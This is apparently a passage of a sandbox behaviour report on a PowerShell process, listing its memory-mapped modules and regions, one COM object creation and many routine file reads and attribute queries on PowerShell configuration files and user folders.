| pagefile_0x0000000002120000 | 0x02120000 | 0x02512fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002520000 | 0x02520000 | 0x0261ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002620000 | 0x02620000 | 0x0262ffff | Private Memory | Readable, Writable |
|
|
|
- |
| l_intl.nls | 0x02630000 | 0x02632fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002640000 | 0x02640000 | 0x0267ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002680000 | 0x02680000 | 0x02680fff | Private Memory | Readable, Writable |
|
|
|
- |
| sorttbls.nlp | 0x02690000 | 0x02694fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000026a0000 | 0x026a0000 | 0x026dffff | Private Memory | Readable, Writable |
|
|
|
- |
| sortkey.nlp | 0x026e0000 | 0x02720fff | Memory Mapped File | Readable |
|
|
|
- |
| microsoft.wsman.runtime.dll | 0x02730000 | 0x02737fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000002740000 | 0x02740000 | 0x0277ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002780000 | 0x02780000 | 0x0281ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002820000 | 0x02820000 | 0x02820fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000002830000 | 0x02830000 | 0x02830fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002860000 | 0x02860000 | 0x0286ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002890000 | 0x02890000 | 0x028cffff | Private Memory | Readable, Writable |
|
|
|
- |
| system.transactions.dll | 0x028d0000 | 0x02912fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000002930000 | 0x02930000 | 0x0296ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002970000 | 0x02970000 | 0x0496ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004a20000 | 0x04a20000 | 0x04a5ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004af0000 | 0x04af0000 | 0x04b2ffff | Private Memory | Readable, Writable |
|
|
|
- |
| system.management.automation.dll | 0x04b30000 | 0x04e11fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll.mui | 0x04e20000 | 0x04edffff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| powershell.exe | 0x21ac0000 | 0x21b31fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.transactions.dll | 0x67aa0000 | 0x67ae2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.management.automation.ni.dll | 0x6cde0000 | 0x6d659fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.ni.dll | 0x6d660000 | 0x6ddfbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscorlib.ni.dll | 0x6de00000 | 0x6e8f7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscorwks.dll | 0x6f050000 | 0x6f5fafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.core.ni.dll | 0x6fb40000 | 0x6fd74fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.transactions.ni.dll | 0x6fe50000 | 0x6feebfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shdocvw.dll | 0x709b0000 | 0x709ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.wsman.management.ni.dll | 0x70b70000 | 0x70bf4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| linkinfo.dll | 0x70c20000 | 0x70c28fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| slc.dll | 0x70c30000 | 0x70c39fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cscapi.dll | 0x70c40000 | 0x70c4afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| srvcli.dll | 0x70c50000 | 0x70c68fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntshrui.dll | 0x70c70000 | 0x70cdffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apphelp.dll | 0x71310000 | 0x7135bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntmarta.dll | 0x71360000 | 0x71380fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| propsys.dll | 0x71400000 | 0x714f4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rsaenh.dll | 0x74420000 | 0x7445afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptsp.dll | 0x74460000 | 0x74475fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x74590000 | 0x7459afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscoreei.dll | 0x745a0000 | 0x74619fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscoree.dll | 0x74620000 | 0x74669fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| version.dll | 0x74850000 | 0x74858fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| comctl32.dll | 0x74870000 | 0x74a0dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcr80.dll | 0x74cb0000 | 0x74d4afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| uxtheme.dll | 0x74ee0000 | 0x74f5ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74f70000 | 0x74f77fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74f80000 | 0x74fdbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x74fe0000 | 0x7501efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.configuration.install.ni.dll | 0x75130000 | 0x75154fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.powershell.commands.diagnostics.ni.dll | 0x75160000 | 0x751aafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.management.automation.dll | 0x751b0000 | 0x75491fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.powershell.consolehost.ni.dll | 0x754a0000 | 0x75520fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| userenv.dll | 0x75530000 | 0x75546fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| atl.dll | 0x75550000 | 0x75563fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x75730000 | 0x7573bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x75740000 | 0x7579ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x757d0000 | 0x7586cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x759b0000 | 0x759d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x75a00000 | 0x75a8efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x75a90000 | 0x75aeffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| devobj.dll | 0x75b30000 | 0x75b41fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x75be0000 | 0x75d3bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x75d40000 | 0x75dcffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x75dd0000 | 0x75e7bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x75e80000 | 0x75ec5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x75fb0000 | 0x760bffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| setupapi.dll | 0x760c0000 | 0x7625cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x76380000 | 0x76389fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| clbcatq.dll | 0x76390000 | 0x76412fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wldap32.dll | 0x76420000 | 0x76464fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x76480000 | 0x770c9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x770d0000 | 0x771bffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x771c0000 | 0x772bffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x773c0000 | 0x77416fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| psapi.dll | 0x77650000 | 0x77654fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77670000 | 0x7773bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x77740000 | 0x777dffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000777e0000 | 0x777e0000 | 0x778fefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000077900000 | 0x77900000 | 0x779f9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77a00000 | 0x77ba8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77be0000 | 0x77d5ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000007efa4000 | 0x7efa4000 | 0x7efa6fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efa7000 | 0x7efa7000 | 0x7efa9fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
|
For performance reasons, the remaining 101 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Host Behavior
COM (1)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | Shell.Application | IClassFactory | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 |
File (537)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
2 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
6 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
6 | |
| Create | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.config | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0 | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW | type = file_attributes |
|
5 | |
| Get Info | C:\ | type = file_attributes |
|
6 | |
| Get Info | C:\Users\kFT6uTQW\Desktop | type = file_attributes |
|
7 | |
| Get Info | C:\Users | type = file_attributes |
|
4 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | type = file_type |
|
2 | |
| Get Info | - | type = file_type |
|
2 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 4096 |
|
3 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 3315 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 781, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 4096 |
|
41 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 436 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 2530 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 542, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4096 |
|
5 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4018 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 78, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 2762 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 310, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 4096 |
|
17 | |
